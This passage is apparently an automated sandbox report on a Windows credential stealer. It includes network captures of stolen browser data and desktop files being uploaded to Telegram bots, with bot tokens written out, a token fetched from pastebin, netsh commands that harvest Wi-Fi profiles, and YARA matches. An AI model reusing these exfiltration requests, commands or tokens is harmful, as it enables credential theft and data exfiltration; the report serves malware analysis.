2024-08-20 09:06:32 UTC | 279 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 39 33 33 37 35 33 37 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 6b 6d 6f 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6e 69 6b 6f 75 6d 6f 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 72 6f 58 36 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 34 31 34 34 37 39 31 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 63 31 20 55 70 6c
                                                            Data Ascii: {"ok":true,"result":{"message_id":493,"from":{"id":7293375371,"is_bot":true,"first_name":"nikmok","username":"nikoumok_bot"},"chat":{"id":5795480469,"first_name":"ZeroX64","username":"Diamotrix","type":"private"},"date":1724144791,"text":"\ud83d\udcc1 Upl


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49706 | 149.154.167.220 | 443 | 8020 | C:\Users\user\Desktop\vYz1Z2heor.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-20 09:06:32 UTC | 254 | OUT | POST /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795480469 HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary="e35d3d9c-f92c-4c5d-add6-08cfbcb74510"
                                                            Host: api.telegram.org
                                                            Content-Length: 119649
                                                            Expect: 100-continue
2024-08-20 09:06:33 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-08-20 09:06:33 UTC | 40 | OUT | Data Raw: 2d 2d 65 33 35 64 33 64 39 63 2d 66 39 32 63 2d 34 63 35 64 2d 61 64 64 36 2d 30 38 63 66 62 63 62 37 34 35 31 30 0d 0a
                                                            Data Ascii: --e35d3d9c-f92c-4c5d-add6-08cfbcb74510
                                                            2024-08-20 09:06:33 UTC261OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 39 61 65 36 31 33 37 34 61 35 61 61 65 63 36 33 39 66 63 64 34 38 64 35 63 33 65 38 30 32 63 61 5c 62 72 6f 6b 40 35 30 36 30 31 33 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 62 72 6f 6b 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 39 61 65 36 31 33 37 34 61 35 61 61 65 63 36 33 39 66 63 64 34 38 64 35 63 33 65 38 30 32 63 61 25 35 43 62 72 6f 6b 25 34 30 35 30 36 30 31 33 5f 65 6e 2d 43 48 2e 7a
                                                            Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9ae61374a5aaec639fcd48d5c3e802ca%5Cuser%40506013_en-CH.z
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 b5 4d 14 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 b5 4d 14 59 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 ca 28 14 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 ca 28 14 59 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42
                                                            Data Ascii: PKMYBrowsers\Edge\PKMYBrowsers\Google\PK(YQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PK(YceS^B
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: c3 43 b7 b5 5b 48 61 6f 42 3f 9a 4d 0b 16 83 2c a5 aa 96 f6 0d 12 40 7f 46 ae 01 31 a0 df 83 38 73 04 7c 7f 87 f4 a4 7a a0 b6 f3 19 aa 54 a3 ea 7b 2e fd e6 25 a7 b4 89 8d d3 00 85 d2 97 3d dd 55 2e af 1c 9f 9e 68 0e df a3 cb e5 e5 f2 78 cc cc 91 cb 04 ab cc c3 c9 df e1 62 dc 88 2f 8e 81 08 d1 ec 3b 73 1e 29 61 1b 25 bc d8 5d 8f 50 c3 96 5b ca 48 2d f6 e1 eb 54 a5 55 fd a1 a2 5d 7c 3d 8c 84 5b 25 98 d4 fb 74 a0 6b 51 c4 58 ba 74 be c5 5f 62 fd 01 dc d3 6a 69 65 6d ed 13 67 37 9a 28 b1 fd 21 d0 dd e4 f9 05 eb b8 af 51 de 84 f8 bf 22 d3 a9 2a 7e cd 3d 28 8e 4b ac 5e e6 93 7c 82 9b d5 eb 30 ae be da ba 25 2e ac 5b 9f 35 14 fc 88 7c c5 ac 24 d5 93 1f 3c 06 72 21 3b 0b 60 cc fb 21 f2 b7 39 85 20 a7 3d f5 e2 8d 14 ba 9e 77 1d 5b 12 b4 7d b2 40 72 a1 04 28 df 93
                                                            Data Ascii: C[HaoB?M,@F18s|zT{.%=U.hxb/;s)a%]P[H-TU]|=[%tkQXt_bjiemg7(!Q"*~=(K^|0%.[5|$<r!;`!9 =w[}@r(
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 30 ae be da ba 25 2e ac 5b 9f 35 14 fc 88 7c c5 ac 24 d5 93 1f 3c 06 72 21 3b 0b 60 cc fb 21 f2 b7 39 85 20 a7 3d f5 e2 8d 14 ba 9e 77 1d 5b 12 b4 7d b2 40 72 a1 04 28 df 93 9e a7 5d aa 7f 68 9d ca 7a 7d 67 c7 73 3b 79 94 cb 87 73 3d e1 8e 01 c5 7c fb ea f8 54 29 ea 23 4f 35 41 3d d1 dd 98 a4 c7 c0 f1 a8 b1 6f a6 92 df 1e 88 ce 1a d0 af 86 dd 15 8b 14 f3 20 c3 de a6 66 3e 99 c2 89 eb 5c 94 96 2d 38 de 2f 62 3f e6 33 ef da 4a f6 37 df 06 df 59 27 b9 eb d3 96 cf 34 c5 75 b7 a3 d4 3c 4f b1 ec 1f c7 6c 28 18 35 24 31 ef 62 56 c8 fb 78 d0 2b 59 27 f1 5d c8 92 cd 8b ed 14 9a 2d 34 83 a4 36 57 57 33 d5 56 66 4c 17 80 25 d4 b4 f7 85 4f cb da e8 a0 ff fe fc 01 50 4b 03 04 14 00 00 00 08 00 f8 33 45 57 2e 53 12 29 84 02 00 00 02 04 00 00 3f 00 00 00 47 72 61 62 62
                                                            Data Ascii: 0%.[5|$<r!;`!9 =w[}@r(]hz}gs;ys=|T)#O5A=o f>\-8/b?3J7Y'4u<Ol(5$1bVx+Y']-46WW3VfL%OPK3EW.S)?Grabb
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 39 ba 7e 52 7e 97 24 f0 cb 6e d2 d3 f7 e4 99 27 ae b6 b9 aa 64 f9 ab 5d 39 c5 b1 8f cf 29 5b da 18 7b 61 44 9a ba 73 5a 65 8e 77 7f 26 a8 1f df 98 ca 5f eb 26 99 88 4e 4b 4b ae 8b d8 a5 5d 2e 53 32 be 9f 23 89 ba fe a0 5a f0 ee 82 8b 5e c2 cd 66 19 b1 cf a2 0b 93 39 b9 9d 7a 9b ae c4 e2 03 94 b5 73 ab 3d ed 92 0f 7c 14 f4 1e 5c 3f 8d 7c d7 35 09 52 71 08 69 b4 57 8a b8 fd 7b ac a6 ff c0 de 47 ee 22 84 d9 a2 d6 b0 56 97 5c a5 ab 1b 84 f2 d7 19 18 ee 0a 5b 33 f2 b3 e2 a1 a6 54 ca d1 61 5b bd b5 43 86 b4 bd 13 ae fc c7 6a ac 2a bd f4 b8 87 ed 31 e2 1e 69 36 fd 4b 8f 44 f2 94 9a c4 db 6a 7e eb 09 9c f0 05 ba ba b3 a7 e2 43 cd ed 3b 8f 5b fb 76 f1 5f d2 1f 6c 73 db cc e0 cd 36 c5 3f 8e 11 c5 ef 5d 3d 75 aa d2 2b 28 9c bf f0 8d f1 52 ac 14 d5 eb 11 7b a9 4b 6a
                                                            Data Ascii: 9~R~$n'd]9)[{aDsZew&_&NKK].S2#Z^f9zs=|\?|5RqiW{G"V\[3Ta[Cj*1i6KDj~C;[v_ls6?]=u+(R{Kj
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: dd f5 0a 53 be 55 b8 9d 8c f2 bc d9 db 92 c5 fc e3 c7 5c f2 f7 ef b0 d3 f6 36 a5 1f 9b f3 78 9d 6f 72 e8 e9 ba ba 28 a3 37 ce a7 2c 0e 71 3d a5 2d 1d 57 86 2d 38 c2 44 b2 92 e6 2e 52 25 49 4e 69 95 cd 47 e4 fa 65 d3 18 11 01 96 d4 5e 97 7a ec c1 e9 e8 27 f4 6e ed 35 04 b4 0e e2 01 9d a5 6f d6 f3 13 cb f4 2c 71 46 50 4f cf 62 ab a1 6d b6 cd 49 d7 6d 41 cb 54 c1 24 bd 1f 07 db 30 0e 03 7e d5 2f 89 9d aa ee 71 8c ec 59 44 00 6e 22 dd f6 8b d7 26 e0 b7 70 4a 78 da a5 58 81 cf ec 5f 63 00 7a 99 98 65 6b b1 2f 8d 62 0d f1 4e d7 7c be 7b 58 6c 80 9d 68 e6 24 5e da 54 bd 30 b9 88 2a 95 7a 17 33 b9 3b 3c 53 e6 de e2 6d 77 cd ed 5d ba 91 8f dc ad c4 8f 91 9f 77 ce 88 0f 34 2a 75 a1 1f f6 b7 f9 7d 6c b9 a8 82 17 c3 e0 df 0e 36 61 e0 50 7f 6e fe 43 25 b8 ee 38 f4 f8
                                                            Data Ascii: SU\6xor(7,q=-W-8D.R%INiGe^z'n5o,qFPObmImAT$0~/qYDn"&pJxX_czek/bN|{Xlh$^T0*z3;<Smw]w4*u}l6aPnC%8
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 67 19 51 7c 1e 41 42 bd d1 58 5f 04 b1 92 1d ad 5e 68 be 8b 0e 08 e4 54 c5 c3 4a 12 0e d1 81 1f e9 34 1f 0e d0 83 31 b6 2f 9f ed 2c 27 9a dc ad b3 21 2c 5d dd 3e bc ed c6 59 70 47 47 0d 18 ae ae a2 81 f6 8d 0e 64 7e 86 3c 91 34 ed 31 61 a0 30 5d 5d 7c fe 54 49 bc 28 19 2f e6 2a 35 f5 b0 f4 b0 c3 3e 53 97 82 1a 03 bf 6e b6 91 dc 1b e0 c6 82 45 a8 c5 1a 3a 80 b8 bc 7a b5 f2 33 a1 54 35 c6 3e f8 f3 9a 04 b4 6f 01 c1 9a 63 65 8a 0e 84 b7 3d 92 94 b2 51 48 2c ff a1 46 f3 19 a0 31 69 2c e9 a3 a0 da b7 40 2e df ee f3 36 3c 32 e5 af 8d 69 a0 25 83 db 5f cf 5b 5f de 3c 95 02 f7 f3 bf 3c 6d e8 c0 75 69 c6 3b 76 b4 5a 8b 95 19 c6 a1 a4 bd e5 53 6e 96 ca a8 47 83 c1 4b 44 c4 ba 1b c9 6e 02 aa ec ff 99 b2 f3 b5 4b 27 5f f9 34 d9 70 4e 95 0e 34 7e 44 fd e6 43 e5 b7 a3
                                                            Data Ascii: gQ|ABX_^hTJ41/,'!,]>YpGGd~<41a0]]|TI(/*5>SnE:z3T5>oce=QH,F1i,@.6<2i%_[_<<mui;vZSnGKDnK'_4pN4~DC
                                                            2024-08-20 09:06:33 UTC16355OUTData Raw: 9a 55 3d f3 b3 79 7b 84 c9 b7 63 7b 5f f4 d5 15 90 04 2f 72 ce 8b fa 15 5f 1b 0b 9c 30 8f ff 95 8b 77 b2 fa f8 6e 6a b1 42 f0 56 88 f2 a0 97 84 f3 c3 94 ea 43 eb f6 28 f0 b0 84 ff 1c d6 44 60 67 cb e7 64 ce ef 27 27 07 13 07 6e 67 92 12 13 38 63 04 15 76 54 ef cc 12 78 f8 f9 7b c6 37 3d c2 f8 d0 d5 9b 09 44 c3 8b cf 9d 36 2e cd 9f 83 a7 95 cd ff da 6c f3 a7 a4 05 ed d8 52 0c ff fb 03 1a 89 17 54 ee 62 ff 0f a7 46 58 f3 ff 20 d6 05 83 63 d2 bf dc 73 8c 7c 1d 7c 2b 25 c7 f8 43 06 0d a9 f6 42 b9 7a c6 51 54 32 19 cb c7 76 2a b0 9e 69 bf 8e 08 8c 04 94 80 20 24 69 94 97 73 dc be 60 00 a3 09 c6 d0 cc 0c 06 52 3e c6 aa 50 bf c5 73 ca ce 74 b8 13 1a 0e 64 50 d9 6d 4e 2a 40 36 c4 2c 22 9c 41 99 51 fe d2 60 07 a9 2f 81 68 d7 8e 61 14 50 c1 8c d7 40 47 ae 45 87 51
                                                            Data Ascii: U=y{c{_/r_0wnjBVC(D`gd''ng8cvTx{7=D6.lRTbFX cs||+%CBzQT2v*i $is`R>PstdPmN*@6,"AQ`/haP@GEQ
                                                            2024-08-20 09:06:33 UTC4819OUTData Raw: 00 00 c8 3b 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 65 73 6b 74 6f 70 5c 50 41 4c 52 47 55 43 56 45 48 5c 45 49 56 51 53 41 4f 54 41 51 2e 70 6e 67 50 4b 01 02 14 00 14 00 00 00 08 00 f8 33 45 57 83 7c 77 bd 84 02 00 00 02 04 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 3e 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 65 73 6b 74 6f 70 5c 50 41 4c 52 47 55 43 56 45 48 5c 45 4f 57 52 56 50 51 43 43 53 2e 70 64 66 50 4b 01 02 14 00 14 00 00 00 08 00 f8 33 45 57 2e 53 12 29 84 02 00 00 02 04 00 00 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 84 41 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 65 73 6b 74 6f 70 5c 50 41
                                                            Data Ascii: ;Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EIVQSAOTAQ.pngPK3EW|w<>Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EOWRVPQCCS.pdfPK3EW.S)=AGrabber\DRIVE-C\Users\user\Desktop\PA
                                                             2024-08-20 09:06:33 UTC | 884 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 20 Aug 2024 09:06:33 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 496
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            {"ok":true,"result":{"message_id":494,"from":{"id":7293375371,"is_bot":true,"first_name":"nikmok","username":"nikoumok_bot"},"chat":{"id":5795480469,"first_name":"ZeroX64","username":"Diamotrix","type":"private"},"date":1724144793,"document":{"file_name":"C_UsersuserAppDataLocal9ae61374a5aaec639fcd48d5c3e802causer@5060.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIB7mbEXJmFAiLNV3MS0i2ENTaktGHKAAJjEgACPN0pUvYVr8xCCXpjNQQ","file_unique_id":"AgADYxIAAjzdKVI","file_size":119304}}}


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             4 | 192.168.2.10 | 49709 | 172.67.19.24 | 443 | 8020 | C:\Users\user\Desktop\vYz1Z2heor.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-08-20 09:06:34 UTC | 74 | OUT | GET /raw/7B75u64B HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                             2024-08-20 09:06:34 UTC | 391 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 20 Aug 2024 09:06:34 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: EXPIRED
                                                            Last-Modified: Tue, 20 Aug 2024 09:06:34 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8b613a63c9137ca8-EWR
                                                             2024-08-20 09:06:34 UTC | 52 | IN | Data Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a
                                                            Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
                                                             2024-08-20 09:06:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                             5 | 192.168.2.10 | 49711 | 149.154.167.220 | 443 | 8020 | C:\Users\user\Desktop\vYz1Z2heor.exe
                                                             Timestamp | Bytes transferred | Direction | Data
                                                             2024-08-20 09:06:35 UTC | 254 | OUT | POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary="e245ce92-0133-448a-9d84-72d663372986"
                                                            Host: api.telegram.org
                                                            Content-Length: 119649
                                                            Expect: 100-continue
                                                             2024-08-20 09:06:35 UTC | 40 | OUT | Data Ascii (hex dump omitted): --e245ce92-0133-448a-9d84-72d663372986
                                                             2024-08-20 09:06:35 UTC | 261 | OUT | Data Ascii (hex dump omitted): Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9ae61374a5aaec639fcd48d5c3e802ca%5Cuser%40506013_en-CH.z
                                                             2024-08-20 09:06:35 UTC | 16355 | OUT | Data Ascii (hex dump omitted): PKMYBrowsers\Edge\PKMYBrowsers\Google\PK(YQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PK(YceS^B
                                                             2024-08-20 09:06:35 UTC | 16355 (x6) | OUT | Data Raw: six further binary ZIP payload chunks (hex dumps omitted)
                                                             2024-08-20 09:06:35 UTC | 4819 | OUT | Data Raw: final ZIP payload chunk (hex dump omitted)
                                                             Data Ascii: ;Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EIVQSAOTAQ.pngPK3EW|w<>Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\EOWRVPQCCS.pdfPK3EW.S)=AGrabber\DRIVE-C\Users\user\Desktop\PA
                                                             2024-08-20 09:06:35 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                             2024-08-20 09:06:35 UTC | 405 | IN | HTTP/1.1 401 Unauthorized
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 20 Aug 2024 09:06:35 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 58
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                             Target ID: 0
                                                             Start time: 05:06:14
                                                             Start date: 20/08/2024
                                                             Path: C:\Users\user\Desktop\vYz1Z2heor.exe
                                                             Wow64 process (32bit): true
                                                             Commandline: "C:\Users\user\Desktop\vYz1Z2heor.exe"
                                                             Imagebase: 0xc0000
                                                             File size: 179'200 bytes
                                                             MD5 hash: 7F1630DF6B57AF024A3B561BDADC208F
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Yara matches:
                                                             • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                             • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                             • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                             • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                             • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                             • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                             • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                             • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                             • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                             • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                             Reputation: low
                                                             Has exited: false

                                                             Target ID: 2
                                                             Start time: 05:06:26
                                                             Start date: 20/08/2024
                                                             Path: C:\Windows\SysWOW64\cmd.exe
                                                             Wow64 process (32bit): true
                                                             Commandline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                             Imagebase: 0xd70000
                                                             File size: 236'544 bytes
                                                             MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Reputation: high
                                                             Has exited: true

                                                             Target ID: 3
                                                             Start time: 05:06:26
                                                             Start date: 20/08/2024
                                                             Path: C:\Windows\System32\conhost.exe
                                                             Wow64 process (32bit): false
                                                             Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                             Imagebase: 0x7ff620390000
                                                             File size: 862'208 bytes
                                                             MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Reputation: high
                                                             Has exited: true

                                                             Target ID: 4
                                                             Start time: 05:06:26
                                                             Start date: 20/08/2024
                                                             Path: C:\Windows\SysWOW64\chcp.com
                                                             Wow64 process (32bit): true
                                                             Commandline: chcp 65001
                                                             Imagebase: 0x8f0000
                                                             File size: 12'800 bytes
                                                             MD5 hash: 20A59FB950D8A191F7D35C4CA7DA9CAF
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Reputation: moderate
                                                             Has exited: true

                                                             Target ID: 5
                                                             Start time: 05:06:26
                                                             Start date: 20/08/2024
                                                             Path: C:\Windows\SysWOW64\netsh.exe
                                                             Wow64 process (32bit): true
                                                             Commandline: netsh wlan show profile
                                                             Imagebase: 0x1160000
                                                             File size: 82'432 bytes
                                                             MD5 hash: 4E89A1A088BE715D6C946E55AB07C7DF
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Reputation: high
                                                             Has exited: true

                                                             Target ID: 6
                                                             Start time: 05:06:26
                                                             Start date: 20/08/2024
                                                             Path: C:\Windows\SysWOW64\findstr.exe
                                                             Wow64 process (32bit): true
                                                             Commandline: findstr All
                                                             Imagebase: 0x1000000
                                                             File size: 29'696 bytes
                                                             MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Reputation: moderate
                                                             Has exited: true

                                                             Target ID: 7
                                                             Start time: 05:06:26
                                                             Start date: 20/08/2024
                                                             Path: C:\Windows\SysWOW64\cmd.exe
                                                             Wow64 process (32bit): true
                                                             Commandline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                             Imagebase: 0xd70000
                                                             File size: 236'544 bytes
                                                             MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Reputation: high
                                                             Has exited: true

                                                             Target ID: 8
                                                             Start time: 05:06:26
                                                             Start date: 20/08/2024
                                                             Path: C:\Windows\System32\conhost.exe
                                                             Wow64 process (32bit): false
                                                             Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                             Imagebase: 0x7ff620390000
                                                             File size: 862'208 bytes
                                                             MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Reputation: high
                                                             Has exited: true

                                                             Target ID: 9
                                                             Start time: 05:06:26
                                                             Start date: 20/08/2024
                                                             Path: C:\Windows\SysWOW64\chcp.com
                                                             Wow64 process (32bit): true
                                                             Commandline: chcp 65001
                                                             Imagebase: 0x8f0000
                                                             File size: 12'800 bytes
                                                             MD5 hash: 20A59FB950D8A191F7D35C4CA7DA9CAF
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Reputation: moderate
                                                             Has exited: true

                                                             Target ID: 10
                                                             Start time: 05:06:27
                                                             Start date: 20/08/2024
                                                             Path: C:\Windows\SysWOW64\netsh.exe
                                                             Wow64 process (32bit): true
                                                             Commandline: netsh wlan show networks mode=bssid
                                                             Imagebase: 0x1160000
                                                             File size: 82'432 bytes
                                                             MD5 hash: 4E89A1A088BE715D6C946E55AB07C7DF
                                                             Has elevated privileges: true
                                                             Has administrator privileges: true
                                                             Programmed in: C, C++ or other language
                                                             Reputation: high
                                                             Has exited: true


                                                               Execution Graph

                                                               Execution Coverage: 16.3%
                                                               Dynamic/Decrypted Code Coverage: 100%
                                                               Signature Coverage: 3%
                                                               Total number of Nodes: 101
                                                               Total number of Limit Nodes: 0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 589 5180b20-5180b75 LdrInitializeThunk 593 5180b7c-5180b83 589->593 594 5180bcb-5180be4 593->594 595 5180b85-5180bb9 593->595 598 5180bef 594->598 599 5180be6 594->599 595->594 604 5180bbb-5180bc5 595->604 600 5180bf0 598->600 599->598 600->600 604->594
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: d253f8aeeac3678421e290770ff3646ae5e42c7e2cd402a14ab67b7ddb7b97fc
                                                              • Instruction ID: 77f3d73c1894a419d515e561b7035add5f956bfc1f5146c0b04dc14662a72a9c
                                                              • Opcode Fuzzy Hash: d253f8aeeac3678421e290770ff3646ae5e42c7e2cd402a14ab67b7ddb7b97fc
